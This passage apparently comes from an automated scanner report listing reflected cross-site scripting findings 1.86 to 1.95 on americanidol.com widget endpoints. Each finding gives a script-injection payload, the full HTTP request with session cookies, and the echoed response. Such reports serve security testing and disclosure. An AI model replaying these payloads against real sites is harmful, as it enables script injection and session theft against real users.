Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:19 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view97b0e'><script>alert(1)</script>6b191eb13af?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.86. http://widgets.myidol.americanidol.com/js/recentActivity/view [cookieFailInstantRedirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the cookieFailInstantRedirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49218'><script>alert(1)</script>32d40dc9b9 was submitted in the cookieFailInstantRedirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true49218'><script>alert(1)</script>32d40dc9b9&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:32 GMT
Content-Length: 1517
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true49218'><script>alert(1)</script>32d40dc9b9&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.87. http://widgets.myidol.americanidol.com/js/recentActivity/view [devkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the devkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fc0'><script>alert(1)</script>41365e5e216 was submitted in the devkey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey48fc0'><script>alert(1)</script>41365e5e216&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:30 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey48fc0'><script>alert(1)</script>41365e5e216&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.88. http://widgets.myidol.americanidol.com/js/recentActivity/view [ms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25fee'><script>alert(1)</script>0b8b3d804a3 was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=131775876625fee'><script>alert(1)</script>0b8b3d804a3 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:46 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
ntActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=131775876625fee'><script>alert(1)</script>0b8b3d804a3'>
...[SNIP]...

1.89. http://widgets.myidol.americanidol.com/js/recentActivity/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 872cd'><script>alert(1)</script>287b5cb03b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766&872cd'><script>alert(1)</script>287b5cb03b8=1 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:09 GMT
Content-Length: 1521
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
tActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766&872cd'><script>alert(1)</script>287b5cb03b8=1'>
...[SNIP]...

1.90. http://widgets.myidol.americanidol.com/js/recentActivity/view [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the num request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3c22'><script>alert(1)</script>21135ca7561 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10f3c22'><script>alert(1)</script>21135ca7561&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:34 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10f3c22'><script>alert(1)</script>21135ca7561&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.91. http://widgets.myidol.americanidol.com/js/recentActivity/view [one_widget_node parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the one_widget_node request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0f1d'><script>alert(1)</script>fde0836013d was submitted in the one_widget_node parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.comd0f1d'><script>alert(1)</script>fde0836013d&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:28 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.comd0f1d'><script>alert(1)</script>fde0836013d&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.92. http://widgets.myidol.americanidol.com/js/recentActivity/view [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7706'><script>alert(1)</script>7290e7f0327 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Networkd7706'><script>alert(1)</script>7290e7f0327&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:39 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Networkd7706'><script>alert(1)</script>7290e7f0327&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.93. http://widgets.myidol.americanidol.com/js/recentActivity/view [view parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the view request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 164ca'><script>alert(1)</script>ec7852c134f was submitted in the view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network164ca'><script>alert(1)</script>ec7852c134f&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:37 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network164ca'><script>alert(1)</script>ec7852c134f&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.94. http://widgets.myidol.americanidol.com/js/recentActivity/view [wurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the wurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91654'><script>alert(1)</script>9ce9e213cbe was submitted in the wurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/91654'><script>alert(1)</script>9ce9e213cbe&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:43 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
ol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/91654'><script>alert(1)</script>9ce9e213cbe&ms=1317758766'>
...[SNIP]...

1.95. http://widgets.myidol.americanidol.com/redirect.one [redirect_to parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /redirect.one

Issue detail

The value of the redirect_to request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c05ca'><script>alert(1)</script>4c9652dc110 was submitted in the redirect_to parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /redirect.one?redirect_to=http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
